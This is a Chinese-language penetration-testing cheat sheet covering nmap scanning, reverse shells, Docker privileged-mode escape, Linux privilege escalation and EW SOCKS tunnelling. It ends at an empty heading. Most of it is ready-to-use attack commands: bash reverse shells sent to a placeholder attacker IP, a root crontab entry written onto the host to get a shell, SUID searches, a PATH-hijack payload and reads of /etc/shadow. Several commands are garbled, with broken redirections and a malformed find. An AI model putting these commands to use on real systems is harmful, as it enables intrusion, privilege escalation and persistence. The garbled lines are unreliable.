一、端口扫描
端口扫描用于知道目标所开放的服务,从而定点做到入侵
1. nmap
nmap -A target -T4 T4中数字越高速度越快越容易被封
2.扫描端口的利用思路
22:ssh 弱口令 或者常用的版本漏洞
80/81:http 存在一定的网站
6389:redis 未授权访问
二、网站漏洞利用
1.利用常用的注入等漏洞
2.针对于框架利用相应的EXP
3. nc监听反弹shell
bash -i >& /dev/tcp/攻击ip/4000 0>&1
nc -lvvp 端口 监听某端口
上诉命令1表示反弹某个shell到攻击ip的4000端口,同时由于下方的nc监听了该端口,可以直接拿到shell
对于上诉命令可以修改
system("echo "bash -i >& /dev/tcp/攻击ip/4000 0>&1" | bash);
该写法可以防止由于环境问题,命令不是在该环境执行所造成的shell不可反弹
三、提权
1. docker 逃逸
对于某些主机为docker环境,我们需要首先采用docker逃逸
1.特权模式逃逸
管理员在启动docker时启用了特权模式,允许docker访问宿主机的磁盘与文件
此时我们可以在宿主机的文件中写入一个计划任务,反弹shell获得宿主机的权限
fdisk -l 查看系统的位置
mount 系统位置 文件 将文件挂载到docker:root权限的文件中
echo "***** root echo"bash -i >0 /dev/tcp/攻击ip/端口 0>&1" | bash" >> 文件/etc/crontab
2.Linux提权
1.内核提权
//查看发行版本
cat /etc/redhat-release 针对redhat和centols
cat /etc/issue
//查看内核版本
uname -a
2.suid提权
a.查找suid文件
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print2>/dev/null
find / -user root -perm -4000-exec ls 0ldb {} \
b.常见可利用的文件
find vim bash less more cp nmap ...
3.密码文件配置错误
/etc/password
/etc/shadow
4. sudo提权
sudo su
sudo -s
sudo -u4294967295
5.计划外任务提权
6.数据库提权
7.劫持环境变量
以suid为前提,我们改写拥有suid应用的内容,从而进行root提权
可以写入一个恶意的ps文件,在tmp文件中写入可以防止由于文件的权限带来的问题
echo "echo "bash -i >b /dev/tcp/攻击ip/4001 0>&1" | bash" >ps
export PATH=/tmp:$PATH 劫持环境变量
chmod 777 ps
四、EW隧道搭建
用于搭建扫描同IP端内部的一些IP
1.连接方式
a.正向连接
ssocksd
b.反向连接
rcsocks(reverse client)
rssocks(reverse service)
c.复杂网络下的多层连接
lcx_slave
lcx_tran
lcx_listen
2.参数说明
I 要监听的本地端口
d 反弹到的远程 ip
e 要反弹到的远程主机端口
f 要主动连接的 ip
g 要主动连接的远程端口
3.一级代理
./ew_for_linux64 -s rcsocks -l 1080 -e 1234 vps上面打开代理
./ew_for_linux -s rssocks -d VPSIP -e 1234 跳板机上面
vi /etc/proxychains4.conf Kali上面配置指定VPS的1080
4.二级代理